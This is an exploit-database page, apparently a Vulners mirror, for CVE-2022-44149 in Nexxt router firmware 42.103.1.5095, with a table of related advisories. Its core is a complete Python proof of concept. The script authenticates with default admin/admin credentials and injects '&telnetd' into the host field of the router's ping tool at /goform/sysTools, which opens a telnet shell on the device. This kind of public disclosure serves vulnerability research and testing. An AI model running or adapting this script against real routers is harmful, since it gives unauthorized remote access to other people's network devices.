Lucene search
K

Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (Authenticated) Exploit

🗓️ 02 Apr 2023 00:00:00Reported by Yerodin RichardsType 
zdt
 zdt
🔗 0day.today👁 158 Views

Nexxt Router Firmware Remote Code Executio

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Nexxt Router Firmware 42.103.1.5095 Remote Code Execution Exploit
4 Jan 202300:00
zdt
Circl
CVE-2022-44149
6 Jan 202320:20
circl
CNNVD
Nexxt Router 操作系统命令注入漏洞
4 Jan 202300:00
cnnvd
CVE
CVE-2022-44149
6 Jan 202300:00
cve
Cvelist
CVE-2022-44149
6 Jan 202300:00
cvelist
Exploit DB
Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated)
1 Apr 202300:00
exploitdb
NVD
CVE-2022-44149
6 Jan 202317:15
nvd
OSV
CVE-2022-44149
6 Jan 202317:15
osv
Packet Storm
Nexxt Router Firmware 42.103.1.5095 Remote Code Execution
4 Jan 202300:00
packetstorm
Prion
Authentication flaw
6 Jan 202317:15
prion
Rows per page
# Exploit Title: Nexxt Router Firmware 42.103.1.5095 - Remote Code Executio=
n (RCE) (Authenticated)
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://www.nexxtsolutions.com/
# Version: 42.103.1.5095
# Tested on: ARN02304U8
# CVE : CVE-2022-44149

import requests
import base64

router_host =3D "http://192.168.1.1"
username =3D "admin"
password =3D "admin"


def main():
    send_payload("&telnetd")
    print("connect to router using: `telnet "+router_host.split("//")[1]+ "=
` using known credentials")
    pass

def gen_header(u, p):
    return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")

def get_cookie(header):
    url =3D router_host+"/login"
    params =3D {"arg":header, "_n":1}
    resp=3Drequests.get(url, params=3Dparams)
   =20
def send_payload(payload):
    url =3D router_host+"/goform/sysTools"
    headers =3D {"Authorization": "Basic {}".format(gen_header(username, pa=
ssword))}
    params =3D {"tool":"0", "pingCount":"4", "host": payload, "sumbit": "OK=
"}
    requests.post(url, headers=3Dheaders, data=3Dparams)


if __name__ =3D=3D '__main__':
    main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Apr 2023 00:00Current
8.8High risk
Vulners AI Score8.8
CVSS 3.18.8
EPSS0.82155
158